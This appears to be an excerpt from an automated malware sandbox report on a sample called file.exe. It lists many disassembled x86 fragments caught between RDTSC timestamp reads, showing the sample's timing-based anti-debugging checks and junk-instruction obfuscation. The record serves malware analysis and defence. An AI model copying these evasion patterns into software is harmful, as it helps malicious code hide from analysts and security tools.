Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EEF78B second address: EEF821 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b jnp 00007F4FB8FDD4FAh 0x00000011 push eax 0x00000012 pushad 0x00000013 popad 0x00000014 pop ebx 0x00000015 push 00000000h 0x00000017 call 00007F4FB8FDD509h 0x0000001c and edi, 067E9659h 0x00000022 pop edi 0x00000023 push 00000000h 0x00000025 push 00000000h 0x00000027 push ebx 0x00000028 call 00007F4FB8FDD4F8h 0x0000002d pop ebx 0x0000002e mov dword ptr [esp+04h], ebx 0x00000032 add dword ptr [esp+04h], 0000001Ah 0x0000003a inc ebx 0x0000003b push ebx 0x0000003c ret 0x0000003d pop ebx 0x0000003e ret 0x0000003f jns 00007F4FB8FDD4FCh 0x00000045 xchg eax, esi 0x00000046 je 00007F4FB8FDD50Ch 0x0000004c jmp 00007F4FB8FDD506h 0x00000051 push eax 0x00000052 pushad 0x00000053 jns 00007F4FB8FDD4FCh 0x00000059 push eax 0x0000005a push edx 0x0000005b pushad 0x0000005c popad 0x0000005d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EEE890 second address: EEE89C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push esi 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EEF821 second address: EEF825 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF0916 second address: EF091B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF091B second address: EF0921 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF0921 second address: EF0925 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF0A6D second address: EF0A71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF38BA second address: EF38BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF5973 second address: EF59B8 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F4FB8FDD50Dh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b mov edi, dword ptr [ebp+122D2ADCh] 0x00000011 push 00000000h 0x00000013 push esi 0x00000014 mov edi, dword ptr [ebp+122D2968h] 0x0000001a pop edi 0x0000001b push 00000000h 0x0000001d push eax 0x0000001e mov edi, 3A5D6167h 0x00000023 pop edi 0x00000024 xchg eax, esi 0x00000025 push eax 0x00000026 push eax 0x00000027 push edx 0x00000028 jp 00007F4FB8FDD4F6h 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF59B8 second address: EF59C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF59C5 second address: EF59CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF69EB second address: EF69F1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF69F1 second address: EF69F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF69F7 second address: EF6A14 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FB8D62280h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF5B45 second address: EF5B5B instructions: 0x00000000 rdtsc 0x00000002 jno 00007F4FB8FDD4F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jl 00007F4FB8FDD4F8h 0x00000014 push eax 0x00000015 pop eax 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF6A14 second address: EF6A18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF4B52 second address: EF4BE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a mov bx, si 0x0000000d push dword ptr fs:[00000000h] 0x00000014 mov dword ptr [ebp+122DB04Eh], esi 0x0000001a mov dword ptr fs:[00000000h], esp 0x00000021 push 00000000h 0x00000023 push eax 0x00000024 call 00007F4FB8FDD4F8h 0x00000029 pop eax 0x0000002a mov dword ptr [esp+04h], eax 0x0000002e add dword ptr [esp+04h], 00000014h 0x00000036 inc eax 0x00000037 push eax 0x00000038 ret 0x00000039 pop eax 0x0000003a ret 0x0000003b or edi, 2A999812h 0x00000041 mov eax, dword ptr [ebp+122D0659h] 0x00000047 push 00000000h 0x00000049 push esi 0x0000004a call 00007F4FB8FDD4F8h 0x0000004f pop esi 0x00000050 mov dword ptr [esp+04h], esi 0x00000054 add dword ptr [esp+04h], 0000001Ah 0x0000005c inc esi 0x0000005d push esi 0x0000005e ret 0x0000005f pop esi 0x00000060 ret 0x00000061 mov dword ptr [ebp+122D3042h], eax 0x00000067 mov ebx, dword ptr [ebp+122D2A88h] 0x0000006d push FFFFFFFFh 0x0000006f or ebx, 7A666D54h 0x00000075 nop 0x00000076 pushad 0x00000077 push esi 0x00000078 ja 00007F4FB8FDD4F6h 0x0000007e pop esi 0x0000007f push eax 0x00000080 push edx 0x00000081 jbe 00007F4FB8FDD4F6h 0x00000087 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF5B5B second address: EF5B69 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4FB8D6227Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF6A18 second address: EF6A1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF6A1E second address: EF6A6E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FB8D6227Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a mov bl, 26h 0x0000000c push 00000000h 0x0000000e push 00000000h 0x00000010 push esi 0x00000011 call 00007F4FB8D62278h 0x00000016 pop esi 0x00000017 mov dword ptr [esp+04h], esi 0x0000001b add dword ptr [esp+04h], 00000019h 0x00000023 inc esi 0x00000024 push esi 0x00000025 ret 0x00000026 pop esi 0x00000027 ret 0x00000028 push 00000000h 0x0000002a jmp 00007F4FB8D62282h 0x0000002f xchg eax, esi 0x00000030 push eax 0x00000031 push edx 0x00000032 pushad 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF6A6E second address: EF6A74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF6A74 second address: EF6A79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF7A6C second address: EF7AE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov dword ptr [esp], eax 0x00000007 mov dword ptr [ebp+122D20B4h], eax 0x0000000d push 00000000h 0x0000000f push 00000000h 0x00000011 push ebx 0x00000012 call 00007F4FB8FDD4F8h 0x00000017 pop ebx 0x00000018 mov dword ptr [esp+04h], ebx 0x0000001c add dword ptr [esp+04h], 0000001Bh 0x00000024 inc ebx 0x00000025 push ebx 0x00000026 ret 0x00000027 pop ebx 0x00000028 ret 0x00000029 jng 00007F4FB8FDD4FBh 0x0000002f mov ebx, 3AF9C49Bh 0x00000034 push 00000000h 0x00000036 push 00000000h 0x00000038 push ebp 0x00000039 call 00007F4FB8FDD4F8h 0x0000003e pop ebp 0x0000003f mov dword ptr [esp+04h], ebp 0x00000043 add dword ptr [esp+04h], 0000001Ch 0x0000004b inc ebp 0x0000004c push ebp 0x0000004d ret 0x0000004e pop ebp 0x0000004f ret 0x00000050 clc 0x00000051 xchg eax, esi 0x00000052 pushad 0x00000053 pushad 0x00000054 jmp 00007F4FB8FDD4FEh 0x00000059 push eax 0x0000005a push edx 0x0000005b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF7AE3 second address: EF7B04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 ja 00007F4FB8D62278h 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F4FB8D62280h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF6C3F second address: EF6C43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF8DCF second address: EF8DDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4FB8D6227Ah 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF7BFA second address: EF7BFE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF7BFE second address: EF7C04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF8E7F second address: EF8E95 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FB8FDD502h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EFAF2D second address: EFAF38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF8F82 second address: EF8F86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF8F86 second address: EF8F8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EFB48A second address: EFB48E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF8F8A second address: EF902E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F4FB8D62286h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 push esi 0x00000012 push eax 0x00000013 jns 00007F4FB8D62276h 0x00000019 pop eax 0x0000001a pop esi 0x0000001b nop 0x0000001c mov dword ptr [ebp+12452A18h], edx 0x00000022 push dword ptr fs:[00000000h] 0x00000029 movzx ebx, bx 0x0000002c mov dword ptr fs:[00000000h], esp 0x00000033 push 00000000h 0x00000035 push eax 0x00000036 call 00007F4FB8D62278h 0x0000003b pop eax 0x0000003c mov dword ptr [esp+04h], eax 0x00000040 add dword ptr [esp+04h], 00000016h 0x00000048 inc eax 0x00000049 push eax 0x0000004a ret 0x0000004b pop eax 0x0000004c ret 0x0000004d jne 00007F4FB8D6227Fh 0x00000053 mov eax, dword ptr [ebp+122D0921h] 0x00000059 sbb ebx, 225A8184h 0x0000005f push FFFFFFFFh 0x00000061 movsx ebx, dx 0x00000064 push ecx 0x00000065 jbe 00007F4FB8D62286h 0x0000006b pop edi 0x0000006c push eax 0x0000006d jg 00007F4FB8D62284h 0x00000073 pushad 0x00000074 push eax 0x00000075 push edx 0x00000076 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EFB48E second address: EFB492 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EFB492 second address: EFB498 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EFB498 second address: EFB4AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4FB8FDD4FFh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EFC460 second address: EFC4CD instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push edx 0x0000000c call 00007F4FB8D62278h 0x00000011 pop edx 0x00000012 mov dword ptr [esp+04h], edx 0x00000016 add dword ptr [esp+04h], 0000001Ah 0x0000001e inc edx 0x0000001f push edx 0x00000020 ret 0x00000021 pop edx 0x00000022 ret 0x00000023 push edx 0x00000024 mov edi, dword ptr [ebp+122D2910h] 0x0000002a pop edi 0x0000002b push 00000000h 0x0000002d add edi, dword ptr [ebp+122D2EE4h] 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push edi 0x00000038 call 00007F4FB8D62278h 0x0000003d pop edi 0x0000003e mov dword ptr [esp+04h], edi 0x00000042 add dword ptr [esp+04h], 0000001Dh 0x0000004a inc edi 0x0000004b push edi 0x0000004c ret 0x0000004d pop edi 0x0000004e ret 0x0000004f mov bx, EA61h 0x00000053 xchg eax, esi 0x00000054 pushad 0x00000055 pushad 0x00000056 push eax 0x00000057 pop eax 0x00000058 push eax 0x00000059 push edx 0x0000005a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EFC4CD second address: EFC4D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EFB769 second address: EFB76F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EFC4D6 second address: EFC4DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EFB76F second address: EFB775 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EFC4DA second address: EFC4F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F4FB8FDD500h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EFC6A2 second address: EFC6A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EFC6A6 second address: EFC712 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ecx 0x0000000b call 00007F4FB8FDD4F8h 0x00000010 pop ecx 0x00000011 mov dword ptr [esp+04h], ecx 0x00000015 add dword ptr [esp+04h], 00000017h 0x0000001d inc ecx 0x0000001e push ecx 0x0000001f ret 0x00000020 pop ecx 0x00000021 ret 0x00000022 xor bh, 00000057h 0x00000025 push dword ptr fs:[00000000h] 0x0000002c mov dword ptr [ebp+122D1817h], ebx 0x00000032 mov dword ptr fs:[00000000h], esp 0x00000039 xor ebx, 728E10A1h 0x0000003f mov eax, dword ptr [ebp+122D1549h] 0x00000045 mov dword ptr [ebp+122D3642h], edx 0x0000004b push FFFFFFFFh 0x0000004d pushad 0x0000004e sub cx, F30Ch 0x00000053 mov edx, 4D4E8975h 0x00000058 popad 0x00000059 nop 0x0000005a pushad 0x0000005b jns 00007F4FB8FDD4F8h 0x00000061 push edx 0x00000062 pop edx 0x00000063 push eax 0x00000064 push edx 0x00000065 push eax 0x00000066 push edx 0x00000067 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EFC712 second address: EFC716 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EFC716 second address: EFC727 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F4FB8FDD4F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F5526F second address: F5527A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push edx 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F55392 second address: F5539B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F5539B second address: F553A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F4FB8D62276h 0x0000000a pop edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F55613 second address: F55624 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jg 00007F4FB8FDD4F6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F55897 second address: F558A1 instructions: 0x00000000 rdtsc 0x00000002 js 00007F4FB8D6227Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F54760 second address: F54769 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push ecx 0x00000006 push eax 0x00000007 pop eax 0x00000008 pop ecx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F54769 second address: F5476E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F5476E second address: F5479B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 pushad 0x00000008 jmp 00007F4FB8FDD503h 0x0000000d jne 00007F4FB8FDD4F6h 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d push edi 0x0000001e pop edi 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F5479B second address: F547B9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FB8D62287h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F5DABD second address: F5DAC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F5DAC1 second address: F5DAC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F5DAC7 second address: F5DACD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F5DACD second address: F5DAEE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F4FB8D62288h 0x0000000a push edx 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F5DAEE second address: F5DAFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F5DAFA second address: F5DB13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007F4FB8D62282h 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F5DB13 second address: F5DB3D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FB8FDD501h 0x00000007 pushad 0x00000008 jmp 00007F4FB8FDD504h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F5D4F6 second address: F5D4FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F5D4FA second address: F5D53F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 jmp 00007F4FB8FDD4FDh 0x0000000e jmp 00007F4FB8FDD505h 0x00000013 pop edx 0x00000014 popad 0x00000015 push edx 0x00000016 jo 00007F4FB8FDD50Bh 0x0000001c jmp 00007F4FB8FDD4FFh 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F5D792 second address: F5D7A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007F4FB8D6227Ch 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F5D7A9 second address: F5D7AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F5D7AE second address: F5D7E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F4FB8D62276h 0x0000000a jmp 00007F4FB8D62280h 0x0000000f push esi 0x00000010 pop esi 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F4FB8D6227Fh 0x0000001d jno 00007F4FB8D62276h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F5D7E6 second address: F5D7EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F5D7EA second address: F5D801 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4FB8D62281h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F6BBC1 second address: F6BBC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F6B763 second address: F6B769 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F6B918 second address: F6B92C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FB8FDD500h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F6B92C second address: F6B94D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jmp 00007F4FB8D6227Ch 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 jng 00007F4FB8D62276h 0x00000016 popad 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F6B94D second address: F6B95A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F4FB8FDD4F6h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F712AB second address: F712B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F712B1 second address: F712B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: F712B5 second address: F712CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 jc 00007F4FB8D62276h 0x0000000f pop ecx 0x00000010 pop esi 0x00000011 pushad 0x00000012 push eax 0x00000013 push eax 0x00000014 pop eax 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
